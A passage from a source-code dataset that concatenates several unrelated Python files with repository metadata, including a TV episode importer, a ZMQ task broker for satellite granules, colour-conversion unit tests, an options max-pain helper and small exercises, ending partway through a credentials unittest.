7c6e9434669640b38953bacf9fd167ce82a3cbba
|
[
"MIT"
] | null | null | null |
humblebee/importer.py
|
steinitzu/humblebee
|
7c6e9434669640b38953bacf9fd167ce82a3cbba
|
[
"MIT"
] | 34
|
2017-10-22T21:50:24.000Z
|
2022-03-28T01:34:30.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging, os, time, shelve
from glob import glob
from datetime import datetime
from send2trash import send2trash
from .dbguy import TVDatabase
from .renaming import Renamer, SymlinkRenamer, make_unknown_dir
from .parser import reverse_parse_episode
from .texceptions import SeasonNotFoundError
from .texceptions import EpisodeNotFoundError
from .texceptions import IncompleteEpisodeError
from .texceptions import ShowNotFoundError
from .texceptions import InvalidDirectoryError
from .texceptions import RARError
from .tvdbwrapper import lookup
from .util import split_root_dir
from .util import normpath
from .util import bytestring_path
from .util import soft_unlink
from .util import syspath
from .util import safe_make_dirs
from .util import make_symlink
from .util import samefile
from .dirscanner import get_episodes
from .dirscanner import is_rar
from .dirscanner import get_file_from_single_ep_dir
from .unrarman import unrar_file
from .quality import quality_battle
from .quality import MediaInfoError
from .util import get_prog_home_dir
from . import appconfig as cfg
log = logging.getLogger('humblebee')
class Importer(object):
    """Scan a TV directory tree, look up episode metadata, and import
    episodes into the database -- optionally renaming/symlinking files and
    extracting rar archives. Behaviour is driven by `appconfig` options.

    NOTE(review): this is Python 2 era code (uses ``.next()`` and
    ``dict.has_key``); keep that in mind before modernizing.
    """
    # Lookup failures that mark an episode as "unparsed" instead of aborting.
    lookup_error = (
        ShowNotFoundError,
        SeasonNotFoundError,
        EpisodeNotFoundError,
        IncompleteEpisodeError
        )

    def __init__(self, rootdir, destdir, **kwargs):
        """Set up database, renamer, mtime cache, and per-run statistics.

        Args:
            rootdir: source directory scanned for episodes.
            destdir: destination directory for renamed files or symlinks.
            **kwargs: unused -- presumably kept for backward compatibility.
        """
        self.db = TVDatabase(rootdir)
        self.rootdir = self.db.directory
        self._cleardb = cfg.get('database', 'clear', bool)
        self._update = cfg.get('database', 'update', bool)
        self._brute = cfg.get('importer', 'brute', bool)
        self._unrar = cfg.get('importer', 'unrar', bool)
        self._forcerename = cfg.get('importer', 'force-rename', bool)
        self._rename = cfg.get('importer', 'rename-files', bool)
        self._symlinks = cfg.get('importer', 'symlinks', bool)
        ns = cfg.get('importer', 'naming-scheme')
        # Symlinking takes precedence over physical renaming.
        if cfg.get('importer', 'symlinks', bool):
            self.renamer = SymlinkRenamer(self.rootdir, destdir, ns)
        elif cfg.get('importer', 'rename-files', bool):
            self.renamer = Renamer(self.rootdir, destdir, ns)
        else:
            self.renamer = None
        if self._cleardb:
            # A fresh import invalidates the saved mtime cache.
            soft_unlink(self._last_stat_path())
        self.last_stat = shelve.open(self._last_stat_path())
        # Per-run statistics, reported by do_import() and write_stats().
        self.failed_lookup = []
        self.added_to_db = []
        self.success_lookup = []
        self.extracted_rar = []
        self.failed_rar = []

    def do_import(self):
        """Run a full import pass over ``rootdir``."""
        if self.db.db_file_exists():
            if self._cleardb:
                self.db.create_database(force=True)
        else:
            self._cleardb = True #no existing db means "first" import
            self.db.create_database()

        def get_ep_by_id(id_):
            # Fetch a single episode row by primary key.
            w = 'WHERE id = ?'
            p = (id_,)
            return self.db.get_episodes(w, p).next()

        log.info('Cleaning up')
        c = self.dust_database()
        for ep in get_episodes(self.rootdir):
            if self.should_import(ep):
                res = self.import_episode(ep)
                if res and self.renamer:
                    ep = get_ep_by_id(res)
                    self.renamer.move_episode(ep, force=self._forcerename)
                # Remember the file's mtime so unchanged files can be
                # skipped on the next (update) run.
                self.last_stat[ep.path('db')] = round(os.path.getmtime(ep.path()),2)
                self.last_stat.sync()
        if self._symlinks:
            make_unknown_dir(self.db, self.renamer.destdir)
        log.info('Cleaning up')
        cc = self.dust_database()
        c = c+cc
        log.info('Deleted %s zombie eps from database', c)
        log.info('Failed lookup count: %s', len(self.failed_lookup))
        log.info('Added to db count: %s', len(self.added_to_db))
        log.info('Succesful lookup count: %s', len(self.success_lookup))
        log.info('extracted rar count: %s', len(self.extracted_rar))
        log.info('failed rar count: %s', len(self.failed_rar))
        self.write_stats()

    def import_episode(self, ep):
        """
        Import a single episode.
        Lookup info, unrar, compare with existing ep, upsert to db.
        Actions performed depend on cfg options.
        Returns ep id or None
        """
        def upsert(epi):
            # Insert/update in db and record for this run's stats.
            idd = self.db.upsert_episode(epi)
            self.added_to_db.append(epi)
            return idd
        try:
            ep = self.fill_episode(ep)
        except self.lookup_error as e:
            self.failed_lookup.append(ep)
            self.db.add_unparsed_child(ep.path('rel'))
            return
        else:
            self.success_lookup.append(ep)
        if self._unrar and is_rar(ep.path()):
            ep = self.unrar_episode(ep)
        idindb = self.db.episode_exists(ep)
        if idindb and self._brute:
            # brute mode: always overwrite the existing row
            return upsert(ep)
        elif idindb:
            better = self.get_better(ep)
            if better is ep:
                return upsert(better)
            else:
                # the existing copy wins (or comparison was inconclusive)
                return
        else:
            return upsert(ep)

    def get_better(self, ep):
        """
        Check if given `ep` is better quality than
        one with same id in db.
        Returns `ep` when it should replace the stored copy, otherwise
        None (same file, rar archive involved, or quality battle lost/failed).
        """
        oldep = self.db.get_episodes('WHERE id=?', params=(ep['id'],)).next()
        if samefile(oldep.path(), ep.path()):
            return
        log.info(
            'Found duplicates. Original: "%s". Contender: "%s".',
            oldep.path(),
            ep.path()
            )
        if not os.path.exists(oldep.path()):
            log.info(
                'Original: "%s" does not exist anymore".'\
                +' Replacing with contender: "%s".',
                oldep.path(),
                ep.path()
                )
            return ep
        if is_rar(ep.path()) or is_rar(oldep.path()):
            #can't battle rars
            return
        #let's fight
        try:
            return quality_battle(ep, oldep, self.db.directory)
        except MediaInfoError as e:
            log.warning(e.message)
            return

    def should_import(self, ep):
        """
        Decide if given episode should be scraped
        or not (based on the mtime cached from the previous run).
        """
        if self._cleardb:
            return True #always scrape when clearing
        p = ep.path('db')
        newmt = round(os.path.getmtime(ep.path()), 2)
        if self.last_stat.has_key(p):
            log.debug('"%s" was scraped last run.', p)
            oldmt = round(self.last_stat[p],2)
            if newmt > oldmt:
                log.debug('"%s" changed since last run.', p)
                log.debug('newmt: %s, oldmt: %s', newmt,oldmt)
                return True
            elif self._update:
                return False #no change, update, no scrape
            else:
                return True
        else:
            return True #not been scraped before, do it

    def fill_episode(self, ep):
        """
        Fill the given `ep` with info from tvdb and return it.
        Raises `lookup_error` if not possible.
        """
        if not ep.is_fully_parsed():
            # derive missing info from the directory structure
            ep = reverse_parse_episode(
                ep.path(), self.rootdir
                )
        try:
            return lookup(ep)
        except self.lookup_error as e:
            log.debug(e.message)
            # retry once with a reverse-parsed episode
            ep = reverse_parse_episode(ep.path(), self.rootdir)
            return lookup(ep)

    def unrar_episode(self, ep, out_dir=None):
        """
        unrar_episode(Episode)
        Extract the episode's rar archive in place.
        Errors are swallowed (and recorded in `failed_rar`).
        """
        p = ep.path()
        if not os.path.isdir(p):
            raise InvalidDirectoryError(
                'Episode path must be a directory. "%s" is not.' % p
                )
        log.info('Extracting "%s" from rar files.', p)
        try:
            unrar_file(p, out_dir=out_dir)
        except RARError as e:
            log.debug('RARError: %s', e.message)
            self.failed_rar.append(ep)
            return ep
        #get new path to episode
        ep['file_path'] = get_file_from_single_ep_dir(p)
        delr = cfg.get('importer', 'delete-rar', bool)
        if delr:
            self.trash_rars_in_dir(p)
        self.extracted_rar.append(ep)
        return ep

    def trash_rars_in_dir(self, directory):
        """
        trash_rars_in_dir(directory)
        Send rar files in given directory to trash.
        """
        log.info('Sending rar files in "%s" to trash.', directory)
        # matches split volumes (*.r00..r99) plus the main archive (*.rar)
        rnfiles = glob(
            os.path.join(directory, '*.r[0-9][0-9]'))
        rarfiles = glob(
            os.path.join(directory, '*.rar'))
        for f in rnfiles+rarfiles:
            send2trash(f)

    def _last_stat_path(self):
        """Path of the shelve file caching per-file mtimes from the last run."""
        return normpath(os.path.join(
            self.rootdir,
            cfg.get('database', 'resume-data-filename')
            ))

    def dust_database(self):
        """
        Remove entries from database for non-existing paths.
        Run after import. Returns the number of deleted rows.
        """
        c = 0
        for ep in self.db.get_episodes():
            if not os.path.exists(ep.path()):
                c+=1
                self.db.delete_episode(ep['id'])
        return c

    def write_stats(self):
        """
        Write some stats for this import (one timestamped file per run).
        """
        statdir = os.path.join(
            get_prog_home_dir('humblebee'),
            'stats'
            )
        safe_make_dirs(statdir)
        sfile = os.path.join(
            statdir,
            str(int(time.time()))
            )
        f = open(sfile, 'w')
        f.write(
            '\nimport at: %s\n----------------\n' % (
                str(datetime.now()))
            )
        f.write(
            '\nsuccess lookup count: %s\n----------------\n' % len(self.success_lookup)
            )
        f.write('\n'.join([e.path() for e in self.success_lookup]))
        f.write(
            '\nfailed lookup count: %s\n----------------\n' % len(self.failed_lookup)
            )
        f.write('\n'.join([e.path() for e in self.failed_lookup]))
        f.write(
            '\nadded to db count: %s\n----------------\n' % len(self.added_to_db)
            )
        f.write('\n'.join([e.path() for e in self.added_to_db]))
        f.write(
            '\nextracted from rar files count: %s\n----------------\n' % len(self.extracted_rar)
            )
        f.write('\n'.join([e.path() for e in self.extracted_rar]))
        f.write(
            '\nfailed rar files count: %s\n----------------\n' % len(self.failed_rar)
            )
        f.write('\n'.join([e.path() for e in self.failed_rar]))
        f.close()
| 33.939873
| 96
| 0.549091
|
4a0f3b195e7140acd5097269a6100ac49223480c
| 6,151
|
py
|
Python
|
avoviirscollector/task_broker.py
|
tparker-usgs/rsCollectors
|
28c3f2ee43c58f3edf2e4ffcf54cce3d912ef72b
|
[
"CC0-1.0"
] | null | null | null |
avoviirscollector/task_broker.py
|
tparker-usgs/rsCollectors
|
28c3f2ee43c58f3edf2e4ffcf54cce3d912ef72b
|
[
"CC0-1.0"
] | 1
|
2019-05-03T00:19:15.000Z
|
2019-05-03T00:19:15.000Z
|
avoviirscollector/task_broker.py
|
tparker-usgs/rsCollectors
|
28c3f2ee43c58f3edf2e4ffcf54cce3d912ef72b
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# I waive copyright and related rights in the this work worldwide
# through the CC0 1.0 Universal public domain dedication.
# https://creativecommons.org/publicdomain/zero/1.0/legalcode
# Author(s):
# Tom Parker <tparker@usgs.gov>
""" Present a consolodated event stream from messages gathered from individual
segment_gatherer processes.
"""
import collections
import threading
import signal
import time
from datetime import timedelta
import zmq
from posttroll.subscriber import Subscribe
import tomputils.util as tutil
from avoviirscollector.viirs import product_key, products, product
from json.decoder import JSONDecodeError
TOPIC = "pytroll://AVO/viirs/granule"
UPDATER_ADDRESS = "tcp://*:19191"
TASKER_ADDRESS = "tcp://*:19091"
ORBIT_SLACK = timedelta(minutes=30)
class ClientTask(threading.Thread):
    """Subscribe to granule messages and funnel them into the shared queue."""

    def __init__(self, msgs):
        threading.Thread.__init__(self)
        self.msgs = msgs

    def run(self):
        # Blocks forever, queueing every message received on TOPIC.
        with Subscribe("", TOPIC, True) as subscription:
            for incoming in subscription.recv():
                try:
                    logger.debug("received message (%d)", len(self.msgs))
                    queue_msg(self.msgs, incoming)
                except Exception:
                    logger.exception("Can't queue message.")
class Server(threading.Thread):
    """Thread owning a ZMQ socket bound to an address, with TCP keepalive."""

    # (option, value) pairs applied to every server socket, in order.
    _KEEPALIVE_OPTS = (
        (zmq.TCP_KEEPALIVE, 1),
        (zmq.TCP_KEEPALIVE_IDLE, 60),
        (zmq.TCP_KEEPALIVE_CNT, 20),
        (zmq.TCP_KEEPALIVE_INTVL, 60),
    )

    def __init__(self, context, msgs, socket_type, address):
        threading.Thread.__init__(self)
        self.msgs = msgs
        self.socket = context.socket(socket_type)
        for option, value in self._KEEPALIVE_OPTS:
            self.socket.setsockopt(option, value)
        self.socket.bind(address)
class Updater(Server):
    """Publish queue statistics once per second over a PUB socket."""

    def __init__(self, context, msgs):
        Server.__init__(self, context, msgs, zmq.PUB, UPDATER_ADDRESS)

    def run(self):
        while True:
            waiting = products(self.msgs.keys())
            status = {
                "queue length": len(self.msgs),
                "products waiting": list(set(waiting)),
            }
            self.socket.send_json(status)
            logger.debug("Updater: queue length:: %d", status["queue length"])
            time.sleep(1)
class Tasker(Server):
    """Hand queued tasks to workers over a REP socket.

    Fixed: previously subclassed threading.Thread while calling
    Server.__init__ directly; it now subclasses Server, which performs the
    identical thread + socket setup (isinstance(threading.Thread) still
    holds for existing callers).
    """

    def __init__(self, context, msgs):
        Server.__init__(self, context, msgs, zmq.REP, TASKER_ADDRESS)

    def get_message(self, request):
        """Pop the oldest queued message whose product the client wants.

        Non-matching entries (and any remainder of a matched list) are
        re-queued at the front in their original order.

        :raises KeyError: when no queued message matches the request.
        """
        with msgs_lock:
            msg = None
            waiting_tasks = collections.OrderedDict()
            while self.msgs:
                (key, msg_list) = self.msgs.popitem(last=False)
                if product(key) in request["desired products"]:
                    if "just testing" in request and request["just testing"]:
                        # Peek only; leave the message queued.
                        msg = msg_list[-1]
                    else:
                        msg = msg_list.pop()
                    if msg_list:
                        logger.debug("requeing {} items".format(len(msg_list)))
                        waiting_tasks[key] = msg_list
                    break
                else:
                    logger.debug(
                        "skipping wrong product: %s :: %s",
                        product(key),
                        request["desired products"],
                    )
                    waiting_tasks[key] = msg_list
            # Restore skipped entries to the front, preserving order.
            for key, val in waiting_tasks.items():
                self.msgs[key] = val
                self.msgs.move_to_end(key, last=False)
            if msg is None:
                raise KeyError("No matching tasks waiting")
            return msg

    def run(self):
        while True:
            logger.debug("waiting for request")
            try:
                request = self.socket.recv_json()
                logger.debug("received request: %s", request)
            except JSONDecodeError:
                logger.exception("Bad request from client")
                # Fixed: the old code fell through with 'request' unbound
                # (NameError) or stale. A REP socket must also answer every
                # received request or the REQ/REP pair deadlocks, so reply
                # with an empty message before waiting again.
                self.socket.send(b"")
                continue
            try:
                msg = self.get_message(request)
                self.socket.send(bytes(msg.encode(), "UTF-8"))
                logger.debug("sent task")
            except KeyError:
                self.socket.send(b"")
                logger.debug("sent empty message")
def queue_msg(msgs, new_msg):
    """Insert new_msg into msgs, merging it into an already-queued message
    for the same product when their start times fall within ORBIT_SLACK."""
    key = product_key(new_msg)
    with msgs_lock:
        if key not in msgs:
            logger.debug("Adding new key %s", key)
            msgs[key] = []
        incoming = new_msg.data
        merged = False
        for queued in msgs[key]:
            existing = queued.data
            if abs(existing["start_time"] - incoming["start_time"]) >= ORBIT_SLACK:
                continue
            # Same orbit: widen the queued message's time span and
            # accumulate the dataset instead of queueing a duplicate.
            logger.debug("updating messge %s", key)
            existing["start_time"] = min(
                existing["start_time"], incoming["start_time"]
            )
            existing["start_date"] = min(
                existing["start_date"], incoming["start_date"]
            )
            existing["end_time"] = max(
                existing["end_time"], incoming["end_time"]
            )
            existing["dataset"] += incoming["dataset"]
            merged = True
            break
        if not merged:
            msgs[key].append(new_msg)
def main():
    """Wire up the subscriber, tasker, and updater threads, then block."""
    # let ctrl-c work as it should.
    signal.signal(signal.SIGINT, signal.SIG_DFL)

    global logger
    logger = tutil.setup_logging("msg_broker errors")

    global msgs_lock
    msgs_lock = threading.Lock()

    logger.debug("Current libzmq version is %s" % zmq.zmq_version())
    logger.debug("Current pyzmq version is %s" % zmq.__version__)

    context = zmq.Context()
    msgs = collections.OrderedDict()

    client = ClientTask(msgs)
    client.start()
    logger.info("client started")

    tasker = Tasker(context, msgs)
    tasker.start()
    logger.info("tasker started")

    updater = Updater(context, msgs)
    updater.start()
    logger.info("updater started")

    # Threads run forever; join keeps the main thread alive.
    for worker in (client, tasker, updater):
        worker.join()


if __name__ == "__main__":
    main()
| 32.204188
| 79
| 0.577142
|
4a0f3c21aa80c62ce97077ed3717d9b5a9f3cdcf
| 1,442
|
py
|
Python
|
examples/shout-and-echo.py
|
AnotherKamila/distributed-algorithms-emulator
|
0abbe91108551651ffee712c93499bc89a3adc27
|
[
"MIT"
] | null | null | null |
examples/shout-and-echo.py
|
AnotherKamila/distributed-algorithms-emulator
|
0abbe91108551651ffee712c93499bc89a3adc27
|
[
"MIT"
] | null | null | null |
examples/shout-and-echo.py
|
AnotherKamila/distributed-algorithms-emulator
|
0abbe91108551651ffee712c93499bc89a3adc27
|
[
"MIT"
] | null | null | null |
"""Implements a shout-and-echo algorithm on any topology."""
from da import Node, Network
import topo
class ShoutAndEcho(Node):
    """Flood a message through the network ('shout') and collect
    acknowledgements ('echo'); terminates when every incident edge is done.
    """

    def run(self):
        # marked_edges[p] is True once edge p has carried an acknowledgement
        # (an 'echo', or a redundant 'shout' which doubles as one).
        marked_edges = [ False for e in range(self.deg) ]
        # Port on which the first 'shout' arrived; non-initiators echo back
        # on this edge when all their edges are marked.
        first_from = None
        if 'shout' in self.data:
            # This node is the initiator: shout on every edge.
            self.data['msg'] = self.data['shout']
            for p in range(self.deg): self.send(p, ('shout', self.data['msg']))
        while True:
            if all(marked_edges):
                if 'shout' not in self.data:
                    self.send(first_from, ('echo', self.data['msg']))
                return
            p, m = self.recv()
            if m[0] == 'echo': marked_edges[p] = True
            if m[0] == 'shout':
                if 'msg' not in self.data:
                    # First time hearing the message: remember the parent edge.
                    self.data['msg'] = m[1]
                    first_from = p
                marked_edges[p] = True
                # NOTE(review): this loop reuses 'p', shadowing the receive
                # port above; harmless here since 'p' is reassigned by the
                # next recv(), but worth renaming.
                for p in range(self.deg):
                    if not marked_edges[p]:
                        self.send(p, ('shout', self.data['msg']))
                    else:
                        self.send(p, ('echo', self.data['msg']))
def run(n):
    """Run shout-and-echo on a random topology of n nodes and verify that
    every node received the broadcast message."""
    msg = 'test'
    t = topo.random(n, n//2)
    net = Network(ShoutAndEcho, t)
    net.nodes[0].data['shout'] = msg
    net.run()

    # check that it worked
    # Fixed: the loop variable was named 'n', shadowing the node-count
    # parameter; renamed to 'node' for clarity and safety.
    for node in net.nodes:
        if node.data['msg'] != msg:
            node.log("did not get the message!")


if __name__ == '__main__':
    run(47)
| 30.680851
| 79
| 0.476422
|
4a0f3f5bac36bae8a389282decc2f03f0155d202
| 5,148
|
py
|
Python
|
colour/graph/tests/test_conversion.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | 1
|
2022-02-12T06:28:15.000Z
|
2022-02-12T06:28:15.000Z
|
colour/graph/tests/test_conversion.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
colour/graph/tests/test_conversion.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Defines the unit tests for the :mod:`colour.graph.conversion` module.
"""
import numpy as np
import unittest
from colour.characterisation import SDS_COLOURCHECKERS
from colour.colorimetry import CCS_ILLUMINANTS, SDS_ILLUMINANTS
from colour.models import COLOURSPACE_MODELS, RGB_COLOURSPACE_ACES2065_1
from colour.graph import describe_conversion_path, convert
__author__ = "Colour Developers"
__copyright__ = "Copyright (C) 2013-2022 - Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"TestDescribeConversionPath",
"TestConvert",
]
class TestDescribeConversionPath(unittest.TestCase):
    """
    Defines :func:`colour.graph.conversion.describe_conversion_path` definition
    unit tests methods.
    """

    def test_describe_conversion_path(self):
        """
        Tests :func:`colour.graph.conversion.describe_conversion_path`
        definition.
        """

        source, target = "Spectral Distribution", "sRGB"

        # Default and long descriptions only need the endpoints.
        describe_conversion_path(source, target)
        describe_conversion_path(source, target, mode="Long")

        # Extended mode additionally echoes conversion-function overrides.
        sd_to_XYZ_overrides = {
            "illuminant": SDS_ILLUMINANTS["FL2"],
            "return": np.array([0.47924575, 0.31676968, 0.17362725]),
        }
        describe_conversion_path(
            source,
            target,
            mode="Extended",
            sd_to_XYZ=sd_to_XYZ_overrides,
        )
class TestConvert(unittest.TestCase):
    """
    Defines :func:`colour.graph.conversion.convert` definition unit tests
    methods.
    """

    def test_convert(self):
        """
        Tests :func:`colour.graph.conversion.convert` definition.
        """

        # Spectral distribution -> display colourspace.
        RGB_a = convert(
            SDS_COLOURCHECKERS["ColorChecker N Ohta"]["dark skin"],
            "Spectral Distribution",
            "sRGB",
        )
        np.testing.assert_almost_equal(
            RGB_a, np.array([0.45675795, 0.30986982, 0.24861924]), decimal=7
        )

        # Round-trip through a perceptually uniform appearance space.
        Jpapbp = convert(RGB_a, "Output-Referred RGB", "CAM16UCS")
        np.testing.assert_almost_equal(
            Jpapbp, np.array([0.39994810, 0.09206557, 0.08127526]), decimal=7
        )

        RGB_b = convert(
            Jpapbp, "CAM16UCS", "sRGB", verbose={"mode": "Extended"}
        )
        # NOTE: The "CIE XYZ" tristimulus values to "sRGB" matrix is given
        # rounded at 4 decimals as per "IEC 61966-2-1:1999" and thus preventing
        # exact roundtrip.
        np.testing.assert_allclose(RGB_a, RGB_b, rtol=1e-5, atol=1e-5)

        np.testing.assert_almost_equal(
            convert("#808080", "Hexadecimal", "Scene-Referred RGB"),
            np.array([0.21586050, 0.21586050, 0.21586050]),
            decimal=7,
        )

        self.assertAlmostEqual(
            convert("#808080", "Hexadecimal", "RGB Luminance"),
            0.21586050,
            places=7,
        )

        np.testing.assert_almost_equal(
            convert(
                convert(
                    np.array([0.5, 0.5, 0.5]),
                    "Output-Referred RGB",
                    "Scene-Referred RGB",
                ),
                "RGB",
                "YCbCr",
            ),
            np.array([0.49215686, 0.50196078, 0.50196078]),
            decimal=7,
        )

        # Per-edge keyword arguments routed via the conversion-name dict.
        np.testing.assert_almost_equal(
            convert(
                RGB_a,
                "RGB",
                "Scene-Referred RGB",
                RGB_to_RGB={"output_colourspace": RGB_COLOURSPACE_ACES2065_1},
            ),
            np.array([0.36364180, 0.31715308, 0.25888531]),
            decimal=7,
        )

        # Consistency check to verify that all the colour models are properly
        # named in the graph:
        for model in COLOURSPACE_MODELS:
            convert(
                np.array([0.20654008, 0.12197225, 0.05136952]),
                "CIE XYZ",
                model,
            )

    def test_convert_direct_keyword_argument_passing(self):
        """
        Tests :func:`colour.graph.conversion.convert` definition behaviour when
        direct keyword arguments are passed.
        """

        a = np.array([0.20654008, 0.12197225, 0.05136952])
        illuminant = CCS_ILLUMINANTS["CIE 1931 2 Degree Standard Observer"][
            "D50"
        ]
        # Direct keyword passing must be equivalent to the per-edge dict form.
        np.testing.assert_almost_equal(
            convert(
                a, "CIE XYZ", "CIE xyY", XYZ_to_xyY={"illuminant": illuminant}
            ),
            convert(a, "CIE XYZ", "CIE xyY", illuminant=illuminant),
            decimal=7,
        )

        # Illuminant "ndarray" is converted to tuple here so that it can
        # be hashed by the "sd_to_XYZ" definition, this should never occur
        # in practical application.
        self.assertRaises(
            AttributeError,
            lambda: convert(
                SDS_COLOURCHECKERS["ColorChecker N Ohta"]["dark skin"],
                "Spectral Distribution",
                "sRGB",
                illuminant=tuple(illuminant),
            ),
        )
# Run the test suite when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
| 31.012048
| 79
| 0.577894
|
4a0f3fccd57866228fd8e5e02091d330846f318e
| 366
|
py
|
Python
|
Array/Leetcode 220. Contains Duplicate III.py
|
kaizhengny/LeetCode
|
67d64536ab80f4966699fe7460d165f2a98d6a82
|
[
"MIT"
] | 31
|
2020-06-23T00:40:04.000Z
|
2022-01-08T11:06:24.000Z
|
Array/Leetcode 220. Contains Duplicate III.py
|
kaizhengny/LeetCode
|
67d64536ab80f4966699fe7460d165f2a98d6a82
|
[
"MIT"
] | null | null | null |
Array/Leetcode 220. Contains Duplicate III.py
|
kaizhengny/LeetCode
|
67d64536ab80f4966699fe7460d165f2a98d6a82
|
[
"MIT"
] | 7
|
2020-04-30T08:46:03.000Z
|
2021-08-28T16:25:54.000Z
|
class Solution:
    def containsNearbyAlmostDuplicate(self, nums: List[int], k: int, t: int) -> bool:
        """Return True if some pair of indices i != j satisfies
        |i - j| <= k and |nums[i] - nums[j]| <= t (brute-force window scan)."""
        # Fast exit: with t == 0 only exact duplicates can ever qualify.
        if t == 0 and len(set(nums)) == len(nums):
            return False
        n = len(nums)
        for i, value in enumerate(nums):
            # Compare against at most the next k elements.
            for j in range(i + 1, min(i + k + 1, n)):
                if abs(nums[j] - value) <= t:
                    return True
        return False
| 40.666667
| 85
| 0.513661
|
4a0f4091907d85c906edd6ea1fbb2f107a6db65b
| 1,197
|
py
|
Python
|
python/Chapter3/Solutions/Exercise3_2.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter3/Solutions/Exercise3_2.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter3/Solutions/Exercise3_2.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
import shelve
# Demo employee rows. Columns: 'ID', 'Name', 'HireDate', 'Grade', 'ManagerID'
employees = [
    ['1','John Brown', '2006-02-23', 'Foreman', ''],
    ['2','Fred Smith', '2014-04-03', 'Laborer', '1'],
    ['3','Anne Jones', '2009-06-17', 'Laborer', '1'],
]
# Salary table. Columns: 'Grade','Amount'
salaries = [
    ['Foreman', 60000],
    ['Laborer', 30000]
]
def createDB(data, shelfname):
    """Store each row of *data* in a shelf, keyed by the row's first field.

    Fixed: if shelve.open() raised, the old ``finally`` clause referenced an
    unbound ``shelf`` and masked the real error with a NameError. The context
    manager only closes a shelf that was actually opened.
    """
    with shelve.open(shelfname, 'c') as shelf:
        for datum in data:
            shelf[datum[0]] = datum
def readDB(shelfname):
    """Return every record stored in the named shelf as a list.

    Fixed: the old ``finally`` clause called ``shelf.close()`` even when
    shelve.open() failed, raising NameError instead of the real error; the
    context manager handles cleanup correctly.
    """
    with shelve.open(shelfname, 'r') as shelf:
        return [shelf[key] for key in shelf]
def with_salary(n):
    """Yield employee records whose grade earns at least *n*."""
    qualifying_grades = {
        grade for grade, amount in readDB('salaryshelf') if amount >= n
    }
    for employee in readDB('employeeshelf'):
        if employee[3] in qualifying_grades:
            yield employee
def main():
    """Build the demo shelves and report staff above two salary thresholds."""
    print('Creating data files...')
    createDB(employees, 'employeeshelf')
    createDB(salaries, 'salaryshelf')
    print('Staff paid more than 30000:')
    for person in with_salary(30000):
        print(person[1])
    print('Staff paid more than 50000:')
    for person in with_salary(50000):
        print(person[1])


if __name__ == "__main__":
    main()
| 23.94
| 78
| 0.597327
|
4a0f40d03c594c93d1243115f4f226428c9840e0
| 1,693
|
py
|
Python
|
gamestonk_terminal/options/volume_helper.py
|
khuang110/GamestonkTerminal
|
98ac22eef1b61de73b4056debc128b66f520ffb9
|
[
"MIT"
] | 1
|
2021-12-17T19:25:12.000Z
|
2021-12-17T19:25:12.000Z
|
gamestonk_terminal/options/volume_helper.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | null | null | null |
gamestonk_terminal/options/volume_helper.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | null | null | null |
"""Functions for analyzing options data"""
__docformat__ = "numpy"
from typing import Union
import pandas as pd
import numpy as np
def get_loss_at_strike(
    strike: Union[int, float], chain: pd.DataFrame
) -> Union[int, float]:
    """
    Total open-interest loss if the underlying expires at ``strike``.

    Parameters
    ----------
    strike: Union[int,float]
        Expiry price at which to evaluate the loss
    chain: Dataframe:
        Option chain indexed by strike, with OI_call and OI_put columns

    Returns
    -------
    loss: Union[float,int]
        Combined call and put loss (put side sign-flipped for plotting)
    """
    itm_call_oi = chain.loc[chain.index < strike, "OI_call"]
    call_loss = ((strike - itm_call_oi.index) * itm_call_oi).sum()

    # Put losses are negated so the _view code plots them below the axis.
    itm_put_oi = chain.loc[chain.index > strike, "OI_put"]
    put_loss = ((itm_put_oi.index - strike) * itm_put_oi * -1).sum()

    return call_loss + put_loss
def get_max_pain(chain: pd.DataFrame) -> Union[int, float]:
    """
    Strike at which the aggregate option-holder loss is minimized (max pain).

    Parameters
    ----------
    chain: DataFrame
        Option chain indexed by strike, with OI_call and OI_put columns

    Returns
    -------
    max_pain :
        Strike with the smallest total loss, or NaN on malformed input
    """
    if ("OI_call" not in chain.columns) or ("OI_put" not in chain.columns):
        print("Incorrect columns. Unable to parse max pain")
        return np.nan

    strikes = np.array(chain.index)
    # Evaluate the loss at every listed strike. As before, this stores a
    # 'loss' column on the caller's dataframe.
    chain["loss"] = [get_loss_at_strike(price, chain) for price in strikes]
    return chain["loss"].idxmin()
| 26.453125
| 75
| 0.632605
|
4a0f42724b780ddeed157440d9a10f316ff1d39f
| 3,019
|
py
|
Python
|
credentials_test.py
|
Chebichii-Lab/password-locker
|
4ec057acb4f1255ac8855462799e38108d463e60
|
[
"MIT"
] | null | null | null |
credentials_test.py
|
Chebichii-Lab/password-locker
|
4ec057acb4f1255ac8855462799e38108d463e60
|
[
"MIT"
] | null | null | null |
credentials_test.py
|
Chebichii-Lab/password-locker
|
4ec057acb4f1255ac8855462799e38108d463e60
|
[
"MIT"
] | null | null | null |
import unittest
from credentials import Credentials # importing the credentials class
class TestCredentials(unittest.TestCase):
    '''
    test class defines test cases for the credentials
    '''

    def setUp(self):
        '''
        set up method runs before other cases
        '''
        self.new_credentials = Credentials("You Tube","natcase","chebichii1")

    def test_init(self):
        '''
        test that a credential object is initialised correctly
        '''
        self.assertEqual(self.new_credentials.account,"You Tube")
        self.assertEqual(self.new_credentials.username,"natcase")
        self.assertEqual(self.new_credentials.password,"chebichii1")

    def test_save_credentials(self):
        '''
